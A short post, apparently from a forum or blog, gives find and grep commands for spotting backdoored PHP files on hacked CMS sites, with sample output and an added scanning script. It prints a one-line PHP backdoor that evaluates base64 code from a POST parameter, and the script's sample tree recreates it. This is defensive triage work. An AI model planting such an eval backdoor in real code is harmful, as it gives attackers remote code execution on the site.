Use find to filter suspicious files from hacked CMS systems

Hi

Here are some simple commands to filter suspicious files from hacked PHP CMS systems:

# count matching lines per PHP file, then drop the files with a count of 0
find . -name "*.php" -type f -exec grep -H -c 'base64_decode(' {} \; | grep -v ':0$'
find . -name "*.php" -type f -exec grep -H -c 'eval(' {} \; | grep -v ':0$'
find . -name "*.php" -type f -exec grep -H -c 'GLOBALS' {} \; | grep -v ':0$'

Here is some example output:

./htdocs/assets/plugins/tinymce/jscripts/tiny_mce/langs/options.php:1
./htdocs/assets/plugins/tinymce/lang/danish.inc.php:1
./htdocs/assets/plugins/managermanager/functions/tabs.inc.php:1
./htdocs/assets/plugins/managermanager/docs/images/javascript.php:1
./htdocs/assets/plugins/qm/css/images/internet_explorer/view.php:1
./htdocs/assets/plugins/qm/press.php:1
./htdocs/assets/plugins/98sidb.php:1
./htdocs/assets/files/press.php:1
./htdocs/assets/templates/manager/global.php:1
./htdocs/assets/snippets/eform/eform.inc.php:1
./htdocs/assets/snippets/eform/lang/dir.php:1
./htdocs/assets/snippets/phpthumb/phpThumb/ThumbBase.inc.php:1
./htdocs/assets/snippets/ditto/lang/portuguese.inc.php:1
./htdocs/assets/snippets/ajaxSearch/js/clearDefault/blog.php:1
./htdocs/assets/snippets/ajaxSearch/classes/ajaxSearchRequest.class.inc.php:1
./htdocs/assets/snippets/ajaxSearch/classes/asPhxParser.class.inc.php:1
./htdocs/assets/snippets/wayfinder/configs/mollio.config.php:1
./htdocs/assets/snippets/weblogin/weblogin.processor.inc.php:2
./htdocs/manager/actions/modules.static.php:1
./htdocs/manager/actions/mutate_snippet.dynamic.php:1
./htdocs/manager/actions/mutate_htmlsnippet.dynamic.php:1
./htdocs/manager/actions/db.php:1
./htdocs/manager/includes/extenders/help.php:1
./htdocs/manager/includes/actionlist.inc.php:1
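./htdocs/manager/includes/lang/german.inc.php:1

Looking at one of the hits shows a one-line backdoor that evaluates base64-encoded PHP sent in a POST parameter:

cat ./htdocs/manager/actions/db.php
eval(base64_decode($_POST['blablabla']))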
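Added example, not from the original post: the three searches combined into a single pass that also copes with spaces in paths, plus a narrower check for eval( fed directly from request data, as in db.php above. The function names scan_php, request_eval and make_sample and the sample tree are made up for illustration.

```shell
#!/bin/sh
# Added example (not from the original post). Function names are hypothetical.

# scan_php DIR: single pass over all *.php files, counting lines that match
# any of the post's three indicators. Prints "hits<TAB>path", most hits first.
scan_php() {
    find "${1:-.}" -type f -name '*.php' \
        -exec grep -EHc 'base64_decode\(|eval\(|GLOBALS' {} + |
    awk -F: '$NF > 0 { n = $NF; sub(/:[0-9]+$/, ""); print n "\t" $0 }' |
    sort -rn
}

# request_eval DIR: narrower triage. Lists files where eval( receives request
# data on the same line, like the db.php backdoor shown above.
request_eval() {
    find "${1:-.}" -type f -name '*.php' \
        -exec grep -El 'eval\(.*\$_(POST|GET|REQUEST|COOKIE)' {} + | sort
}

# Constructed sample tree so the example runs offline; prints its path.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/manager/actions" "$d/assets/my plugin"
    printf '%s\n' '<?php' "eval(base64_decode(\$_POST['x']));" \
        > "$d/manager/actions/db.php"
    printf '%s\n' '<?php' '$img = base64_decode($stored); // legitimate use' \
        > "$d/assets/my plugin/thumb.php"
    printf '%s\n' '<?php echo "hello";' > "$d/index.php"
    printf '%s\n' "$d"
}

sample=$(make_sample)
scan_php "$sample"        # every file with at least one indicator
request_eval "$sample"    # only the file that evals request input
rm -rf "$sample"
```

The broad scan also lists files that use base64_decode legitimately, so its hits still need a manual look; the narrow check is a quick way to decide which ones to open first.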

Have fun!